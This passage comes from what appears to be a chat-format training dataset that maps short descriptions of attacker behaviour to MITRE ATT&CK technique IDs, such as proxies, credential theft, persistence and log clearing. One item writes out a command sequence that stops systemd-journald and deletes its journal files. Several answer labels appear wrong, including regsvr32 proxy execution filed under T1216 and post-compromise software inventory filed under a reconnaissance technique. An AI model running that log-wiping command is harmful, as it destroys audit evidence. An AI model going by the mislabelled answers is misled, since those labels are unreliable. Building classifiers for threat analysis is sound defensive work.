- "content": "T1561.002 - Disk Wipe: Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware establishes an internal SOCKS proxy on a compromised workstation to route lateral movement traffic."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion employs covert channel techniques by varying packet sizes and timing to signal internal commands."
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An intruder crafts a specially named shared object that matches a legitimate library name, which the dynamic linker loads, enabling code execution."
- },
- {
- "role": "assistant",
- "content": "T1574.006 - Hijack Execution Flow: Dynamic Linker Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor captures screenshots of the victim's desktop at regular intervals."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A script queries a device's API to pull its configuration data for later analysis."
- },
- {
- "role": "assistant",
- "content": "T1602.002 - Data from Configuration Repository: Network Device Configuration Dump"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During intrusion, the attacker modifies the executable's name to include an extra whitespace at the end, exploiting parsers that trim spaces inconsistently."
- },
- {
- "role": "assistant",
- "content": "T1036.006 - Masquerading: Space after Filename"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion leverages an internal SharePoint site to host a malicious HTML file, and emails employees a link to visit the page."
- },
- {
- "role": "assistant",
- "content": "T1534 - Internal Spearphishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A credential dumping tool was followed by a script that removed the compromised accounts from the Active Directory."
- },
- {
- "role": "assistant",
- "content": "T1531 - Account Access Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A red team script calls verclsid.exe to run a concealed malicious script, taking advantage of the binary's legitimate status."
- },
- {
- "role": "assistant",
- "content": "T1218.012 - System Binary Proxy Execution: Verclsid"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After escalating privileges, the attacker creates a snapshot of a target Azure VM to facilitate later re‑deployment."
- },
- {
- "role": "assistant",
- "content": "T1578.001 - Modify Cloud Compute Infrastructure: Create Snapshot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor utilizes HTTPS proxy tunneling to hide malicious traffic within normal web requests."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary uses LDAP modify operations to set the userAccountControl attribute to 514, disabling the account."
- },
- {
- "role": "assistant",
- "content": "T1531 - Account Access Removal"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary performs a brute‑force enumeration of AWS S3 bucket names using a wordlist."
- },
- {
- "role": "assistant",
- "content": "T1526 - Cloud Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker creates a fake internal IT support ticket system and emails staff a link, asking them to re-enter their domain credentials to resolve a fabricated network issue."
- },
- {
- "role": "assistant",
- "content": "T1598 - Phishing for Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attackers embed a scheduled Android AlarmManager event that triggers a background service to upload contacts nightly."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary used a watering‑hole attack, compromising a popular industry forum to serve malicious JavaScript to visitors."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The trojan checks for the presence of VMware driver files (vmhgfs.dll) and alters its behavior if they are found."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clearing of the Event Viewer logs was performed to cover tracks after credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor leveraged XSL script processing to bypass application whitelisting by embedding encoded scripts in the stylesheet, which were later executed."
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker performs a credential brute‑force attack against a poorly protected Reddit account using automated tools."
- },
- {
- "role": "assistant",
- "content": "T1586.001 - Compromise Accounts: Social Media Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing campaign uses a malicious link embedded in a fake invoice PDF, prompting the victim to click and download ransomware from a compromised website."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion script re‑generated the server's RSA keys with a 1024‑bit modulus, weakening the cryptographic strength."
- },
- {
- "role": "assistant",
- "content": "T1600.001 - Weaken Encryption: Reduce Key Space"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intruder uses the BloodHound tool to map out domain groups and their relationships within the network."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary creates a new local account with a name prefixed by a dot and sets its shell to /sbin/nologin to hide its presence from regular user listings."
- },
- {
- "role": "assistant",
- "content": "T1564.002 - Hide Artifacts: Hidden Users"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversary probes Active Directory trust links to identify additional victim domains they can pivot to."
- },
- {
- "role": "assistant",
- "content": "T1590.003 - Gather Victim Network Information: Network Trust Dependencies"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries install a malicious network provider DLL to intercept and modify user authentication credentials."
- },
- {
- "role": "assistant",
- "content": "T1556.008 - Modify Authentication Process: Network Provider DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker manipulates the OAuth token exchange in a hybrid identity deployment, generating tokens that grant elevated privileges without user interaction."
- },
- {
- "role": "assistant",
- "content": "T1556.007 - Modify Authentication Process: Hybrid Identity"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An adversary gains access to a router's CLI over SSH and runs unauthorized configuration commands to create a backdoor."
- },
- {
- "role": "assistant",
- "content": "T1059.008 - Command and Scripting Interpreter: Network Device CLI"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries drop a crafted Terminal Services DLL into %SystemRoot%\\System32\\rdp, which is later loaded by the RDP service to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1505.005 - Server Software Component: Terminal Services DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary sets up a cron job on compromised Linux servers to periodically copy stolen credentials to an external IP address."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker leverages a compromised router to perform packet sniffing and inject malicious commands into the communication between IoT devices and their cloud service."
- },
- {
- "role": "assistant",
- "content": "T1557 - Adversary-in-the-Middle"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By placing a rogue executable in a directory with spaces and ensuring the path is referenced without quotes in a startup script, the attacker hijacks the execution flow to run their code with elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1574.009 - Hijack Execution Flow: Path Interception by Unquoted Path"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First, a malicious macro drops a small loader which contacts a command-and-control server; the loader then retrieves a larger payload concealed inside a JPEG image over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat actor modifies the authorized_keys file of the ec2-user on an AWS EC2 instance to include their own key, enabling stealthy remote access."
- },
- {
- "role": "assistant",
- "content": "T1098.004 - Account Manipulation: SSH Authorized Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor disables Windows Event Logging to hide their activities by stopping the EventLog service."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A post‑exploitation script ran 'wmic product get name,version' to gather software inventory from the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1592.002 - Gather Victim Host Information: Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker loads a previous version of the operating system image onto the device to roll back security patches and gain elevated privileges."
- },
- {
- "role": "assistant",
- "content": "T1601.002 - Modify System Image: Downgrade System Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries query Reverse DNS lookup services and passive DNS data sets to correlate IPs with domain names."
- },
- {
- "role": "assistant",
- "content": "T1596.001 - Search Open Technical Databases: DNS/Passive DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker modifies a public-facing web form to include hidden fields that silently capture submitted data, including passwords and personal information."
- },
- {
- "role": "assistant",
- "content": "T1056.003 - Input Capture: Web Portal Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious code is injected via the AppInit_DLLs mechanism, ensuring the malicious DLL runs whenever a graphical user session starts."
- },
- {
- "role": "assistant",
- "content": "T1546.010 - Event Triggered Execution: AppInit DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware authors take over a VPS and use it to distribute updated malware variants to victims."
- },
- {
- "role": "assistant",
- "content": "T1584.003 - Compromise Infrastructure: Virtual Private Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware employs a legitimate system utility like 'regsvr32' to load a malicious script as a proxy, thereby executing code while appearing benign."
- },
- {
- "role": "assistant",
- "content": "T1216 - System Script Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Adversaries harvest credentials from a compromised workstation and reuse the legitimate username/password pairs to log into remote servers."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker performs a live memory analysis of securityd to recover saved password hashes."
- },
- {
- "role": "assistant",
- "content": "T1555.002 - Credentials from Password Stores: Securityd Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor leverages an internal proxy server hijacked via credential theft to relay command and control communications."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker resets the local admin account password on a wireless access point, gaining unrestricted network access."
- },
- {
- "role": "assistant",
- "content": "T1556.004 - Modify Authentication Process: Network Device Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware leverages rundll32.exe to call a DLL's exported function, providing a stealthy execution vector."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - System Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion sets up a malicious TLS callback in a trusted binary, enabling code execution during thread startup."
- },
- {
- "role": "assistant",
- "content": "T1055.005 - Process Injection: Thread Local Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The intrusion tool inspects the system's network connection list to identify active communication endpoints."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker uses a polyglot file that appears as a PNG image but contains an embedded ELF binary payload."
- },
- {
- "role": "assistant",
- "content": "T1027.009 - Obfuscated Files or Information: Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor embeds a malicious executable within an image file's metadata, allowing the payload to be executed when the image is processed."
- },
- {
- "role": "assistant",
- "content": "T1027.009 - Obfuscated Files or Information: Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A phishing email delivers a payload that runs 'whoami /all' to reveal the current user's group memberships."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor injects a malicious VBA macro into a corporate PowerPoint template so that the code executes whenever a user creates a new presentation from that template."
- },
- {
- "role": "assistant",
- "content": "T1137.001 - Office Application Startup: Office Template Macros"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors leverage LDAP queries against the “trustedDomain” attribute to map inter‑domain trust relationships."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware establishes a Bluetooth pairing with a rogue device to exfiltrate data."
- },
- {
- "role": "assistant",
- "content": "T1011.001 - Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors accessed the organization's password store in Oracle Cloud Infrastructure Vault to download database credentials."
- },
- {
- "role": "assistant",
- "content": "T1555.006 - Credentials from Password Stores: Cloud Secrets Management Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary steals password hashes from a compromised system and leverages them to access network shares."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor clears the systemd journal on a Linux system by running 'systemctl stop systemd-journald' followed by 'rm -rf /var/log/journal/*'."
- },
- {
- "role": "assistant",
- "content": "T1070.002 - Indicator Removal: Clear Linux or Mac System Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Red team simulates establishing a rogue Exchange mailbox to serve as a covert channel for data exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Establish Accounts: Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware collects the system's GPS coordinates via the device's location API and exfiltrates them to the command server."
- },
- {
- "role": "assistant",
- "content": "T1614 - System Location Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The implant transforms stolen data into a printable ASCII format using rot13 before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors abuse the Visual Studio build engine to run malicious scripts, using its trusted status to execute code."
- },
- {
- "role": "assistant",
- "content": "T1127 - Trusted Developer Utilities Proxy Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During credential dumping, the group first uses regsvcs.exe to load a custom .NET payload that escalates privileges."
- },
- {
- "role": "assistant",
- "content": "T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker leverages WMI event subscriptions to store malicious PowerShell commands that run in memory when a specific system event occurs, achieving fileless execution."
- },
- {
- "role": "assistant",
- "content": "T1027.011 - Obfuscated Files or Information: Fileless Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker infiltrates a trusted software vendor's build environment and extracts the code signing certificate to sign malicious binaries."
- },
- {
- "role": "assistant",
- "content": "T1588.003 - Obtain Capabilities: Code Signing Certificates"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor leveraged HTTP/HTTPS traffic to a compromised web server to exfiltrate data and receive commands."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Actor abuses the 'vaultcmd' command to list and export credentials from the Windows Credential Manager."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group gathers information about the target's physical locations through satellite imagery services."
- },
- {
- "role": "assistant",
- "content": "T1591.001 - Gather Victim Org Information: Determine Physical Locations"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Through privilege escalation, the threat actor modifies existing stored procedures to include calls to system binaries."
- },
- {
- "role": "assistant",
- "content": "T1505.001 - Server Software Component: SQL Stored Procedures"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malicious insider adds a rule in Office 365 that forwards all corporate emails to a personal email account."
- },
- {
- "role": "assistant",
- "content": "T1114.003 - Email Collection: Email Forwarding Rule"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware resolves its C2 server using DNS queries that return a rapidly changing list of IPs, characteristic of fast‑flux DNS."
- },
- {
- "role": "assistant",
- "content": "T1568.001 - Dynamic Resolution: Fast Flux DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The adversary places a malicious .command file in the user's /Users//Library/Application Support/com.apple.loginitems folder."
- },
- {
- "role": "assistant",
- "content": "T1547.015 - Boot or Logon Autostart Execution: Login Items"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat actors perform a search for the target's domain combined with \"login\" to find exposed login portals."
- },
- {
- "role": "assistant",
- "content": "T1593.002 - Search Open Websites/Domains: Search Engines"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A threat group uses a custom web service endpoint to exchange data with back‑door implants, enabling command‑and‑control via bidirectional messaging."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Web Service: Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker leverages a compromised router to mirror traffic to a remote server for deep packet inspection."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
